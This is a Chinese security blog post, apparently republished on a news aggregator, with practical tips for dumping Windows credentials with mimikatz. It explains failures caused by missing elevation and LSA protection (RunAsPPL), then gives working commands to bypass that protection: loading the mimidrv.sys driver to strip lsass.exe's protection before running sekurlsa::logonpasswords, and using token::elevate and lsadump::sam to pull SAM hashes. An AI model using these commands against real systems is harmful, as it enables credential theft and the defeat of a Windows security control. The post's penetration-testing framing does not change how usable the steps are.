Redian新闻
>
mimikatz的一些实战小技巧

mimikatz的一些实战小技巧

科技


前言

最近在一些环境中使用mimikatz读取密码出现了些问题,简单记录下。

问题分类

1、权限

这种情况就属于权限不到位,虽然是管理员权限但是需要右键管理员权限启动cmd

权限到位就没问题。

2、 LSA 保护 (RunAsPPL)

在 Windows 上防止凭据盗窃时,启用 LSA 保护应该是最简单的方式,配置起来简单又方便只需要在注册表中添加个一个值然后重新启动下即可。

启用 LSA 保护 (RunAsPPL):

(1)
打开注册表编辑器:regedit.exe。 
(2)
打开"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa"。 
(3)
添加DWORD值RunAsPPL并将其设置为1并且重启。

现在你已经成功开启了LAS保护,mimikatz已经不能读取凭证信息。

mimikatzprivilege::debug中的命令成功启用;SeDebugPrivilege,但是命令sekurlsa::logonpasswords失败并出现错误代码0x00000005。要想知道错误代码0x00000005的原因我们可以去查看源码。

HANDLE hData = NULL;DWORD pid;DWORD processRights = PROCESS_VM_READ | PROCESS_QUERY_INFORMATION;
kull_m_process_getProcessIdForName(L"lsass.exe", &pid);hData = OpenProcess(processRights, FALSE, pid);
if (hData && hData != INVALID_HANDLE_VALUE) { // if OpenProcess OK} else { PRINT_ERROR_AUTO(L"Handle on memory");}

这段代码中它首先获取被调用进程的 PID,lsass.exe然后尝试使用标志和调用Win32函数来打开它(即获取进程句柄),现在他的访问被拒绝了所以我们的LSA保护成功打开了,成功阻止mimikatz读取凭证。

绕过 RunAsPPL:

1、mimikatz驱动程序 它可以阻止mimikatz,然而mimikatz也可以通过自身工具进行绕过,使用数字签名的驱动程序来删除内核中 Process 对象的保护标志,但是需要文件mimidrv.sys必须位于当前文件夹中。 

(1)、文件mimidrv.sys必须位于当前文件夹中。

(2)、

 !+ !processprotect /process:lsass.exe /remove privilege::debug sekurlsa::logonpasswords

成功读取凭证。2、SAM HKLM\SAM:包含用户密码的NTLMv2哈希值 HKLM\security:包含缓存的域记录LSA secrets/LSA密钥 HKLM\system-aka SYSKEY:包含可用于加密LSA secret和SAM数据库的密钥 SAM(安全账户管理器),SAM用来存储Windows操作系统密码的数据库文件,为了避免明文密码泄露,SAM文件中保存的是明文密码经过一系列算法处理过的Hash值。mimikatz 运行 lsadump :: sam 从磁盘上的SAM读取凭据,可成功pypass LSA Protection。

 privilege::debug token::whoami token::elevate lsadump::sam

成果读取。

2、 特殊情况

没有LSA保护也不是权限问题。

报错key import 解决起来也很简单直接用老版本mimikatz(2.1.1)就可以了,至于原因暂时不清楚。

简单记录下几个简单的问题,主要是怕忘。

E

N

D



Tide安全团队正式成立于2019年1月,是新潮信息旗下以互联网攻防技术研究为目标的安全团队,团队致力于分享高质量原创文章、开源安全工具、交流安全技术,研究方向覆盖网络攻防、系统安全、Web安全、移动终端、安全开发、物联网/工控安全/AI安全等多个领域。

团队作为“省级等保关键技术实验室”先后与哈工大、齐鲁银行、聊城大学、交通学院等多个高校名企建立联合技术实验室,近三年来在网络安全技术方面开展研发项目60余项,获得各类自主知识产权30余项,省市级科技项目立项20余项,研究成果应用于产品核心技术研究、国家重点科技项目攻关、专业安全服务等。对安全感兴趣的小伙伴可以加入或关注我们。


微信扫码关注该文公众号作者

戳这里提交新闻线索和高质量文章给我们。
相关阅读
《 拾 梦》荨麻疹患者,需完善哪些实验室检查?有哪些提高排版“颜值”的小技巧?建议收藏!保持冥想练习的 8 个小技巧现代成年人的痛苦焦虑,被这一个小技巧治愈了投资Y份额养老基金,一些实用建议参观美国国会图书馆联邦预算警告明年电费涨幅将高达50%? 维州家庭一个小技巧“轻松省下$1400”!生活成本持续上升,为了省钱澳洲人们各出奇招屡战屡败不可怕,加急也有小诀窍!美国律师为您详细解读申请小技巧!4个小技巧搞定复杂的业务场景设计2022年末税务规划注意事项和小技巧这个煮玉米的小技巧,你一定要知道。A计划和B计划简单有效!美国医生推荐的新冠非药物治疗小技巧秋季护肤指南,3 个小技巧,唤醒水润嘭嘭肌蒸1锅都没够吃,全靠这个小技巧!喧软爆汁,轻松让营养翻倍一个减肥小技巧,不用长期节食也能瘦学会不吃亏:PPT里那些P图小技巧!码住!Coles和WWS圣诞省钱小技巧,有澳妈采购$200商品只花了$2出头!免费~ 荷顿区、蛤蟆囤堆肥快来领, 施肥小技巧, 包你后院花美收成好你经历过哪些实习尴尬时刻新手化妆小技巧,化妆知识我存香港IPO最新监管如何?有哪些实务要点?一次性讲清楚!数学启蒙|提升计算速度,试试这些小技巧,亲测有效!对Kmart失望了!这项鲜为人知的购物小技巧,你知道嘛!星期五,和探春讲个英国故事。。两天赚1w,用Python接私活的一些技巧数据科学|九大名企项目实战+编程技巧深度解析+模拟面试+简历精修……条件标准规则dang纪guo法, 重要吗? 重要, 有用吗?有用, 但归根结底还是XI的一句话SiFive推出高达3.4Ghz的RISC-V处理器,高通和三星评估你知道怎么写“好的”文书吗?快来看看这些小技巧吧!干货篇|卖车比价,二手车买卖!这些小技巧,分分钟省个买包钱还没找到适合的时间管理方法?这些小技巧你知道了吗?放学后想问问孩子在校的情况,你以为在沟通,其实可能只是尬聊……实用亲子沟通小技巧,学起来!压抑、内耗、痛苦,都被这一个小技巧治愈了
logo
联系我们隐私协议©2024 redian.news
Redian新闻
Redian.news刊载任何文章,不代表同意其说法或描述,仅为提供更多信息,也不构成任何建议。文章信息的合法性及真实性由其作者负责,与Redian.news及其运营公司无关。欢迎投稿,如发现稿件侵权,或作者不愿在本网发表文章,请版权拥有者通知本网处理。